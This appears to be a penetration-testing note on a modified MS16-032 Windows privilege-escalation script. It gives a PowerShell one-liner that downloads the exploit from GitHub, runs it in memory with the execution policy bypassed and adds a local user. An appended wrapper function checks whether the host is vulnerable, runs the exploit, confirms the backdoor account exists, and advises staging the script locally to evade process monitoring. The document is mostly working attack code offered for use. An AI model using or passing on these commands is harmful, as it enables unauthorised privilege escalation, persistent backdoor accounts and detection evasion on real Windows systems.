

A version of the script modified by a skilled contributor can execute any program, with arguments, and does so without any pop-up window during the process. The script is at: https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1

Usage is as follows:
Adding a user:


Running a program:



Adding a user remotely:
Run the following command directly to escalate privileges and add a user (it fetches the script over HTTPS, runs it in memory with the execution policy bypassed, and hands cmd.exe a `net user ... /add` command line):

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"
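The one-liner above fires the exploit blind. As an added example (not code from the original post or from the linked script), the wrapper below runs the checks an operator wants first and confirms afterwards that the payload ran. It relies on two facts about MS16-032: the bug is a handle race in the Secondary Logon service (seclogon), so a disabled service means the exploit cannot work, and the fix shipped as KB3139914. The function names are invented for this example; `-Application` and `-commandline` are the parameter names the post's own command passes to Invoke-MS16-032.

```powershell
# Added example, not from the original post or the linked script.
# Preflight checks plus verification around the post's Invoke-MS16-032 call.
# Test-MS16032Preconditions / Invoke-MS16032AddUser are names made up here.

function Test-MS16032Preconditions {
    $ok = $true

    # MS16-032 races the Secondary Logon service (seclogon). StartMode Manual is
    # fine (CreateProcessWithLogonW starts it on demand); Disabled means no race.
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='seclogon'"
    if (-not $svc -or $svc.StartMode -eq 'Disabled') {
        Write-Warning "seclogon is missing or disabled; MS16-032 will not work here."
        $ok = $false
    }

    # KB3139914 is the MS16-032 fix; if it is installed the race has been closed.
    if (Get-HotFix -Id KB3139914 -ErrorAction SilentlyContinue) {
        Write-Warning "KB3139914 is installed; this host is patched against MS16-032."
        $ok = $false
    }

    # Nothing to escalate if the current token is already elevated.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        Write-Warning "Already running as an elevated administrator; no escalation needed."
        $ok = $false
    }
    return $ok
}

function Invoke-MS16032AddUser {
    param(
        [Parameter(Mandatory)] [string]$UserName,
        [Parameter(Mandatory)] [string]$Password,
        # Defaults to the URL from the post; point it at a staged local copy instead
        # when you do not want the target fetching scripts from the internet.
        [string]$ScriptSource = 'https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1'
    )
    if (-not (Test-MS16032Preconditions)) { return $false }

    # Load the script: dot-source a staged file, or pull it into memory as the post does.
    if (Test-Path -LiteralPath $ScriptSource) {
        . $ScriptSource
    } else {
        Invoke-Expression (New-Object Net.WebClient).DownloadString($ScriptSource)
    }

    # cmd.exe /c runs one command and exits; the whole command line is passed as a
    # single string, exactly as the post's -commandline argument is built.
    $cmdLine = "/c net user $UserName $Password /add"
    Invoke-MS16-032 -Application cmd.exe -commandline $cmdLine

    # Verify the payload ran: 'net user <name>' exits non-zero when the account is absent.
    Start-Sleep -Seconds 2
    net user $UserName | Out-Null
    return ($LASTEXITCODE -eq 0)
}

# Same effect as the post's one-liner, but with the checks above:
# Invoke-MS16032AddUser -UserName evi1cg -Password test123
```

The return value tells you whether the account exists afterwards, which is the only reliable signal that the race was won; the script printing nothing is not. Note also that the post's one-liner (`powershell -nop -exec bypass` plus `DownloadString` to a raw GitHub URL) is an obvious process-creation signature, so on a monitored host stage the script locally and pass the file path as `-ScriptSource` instead.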
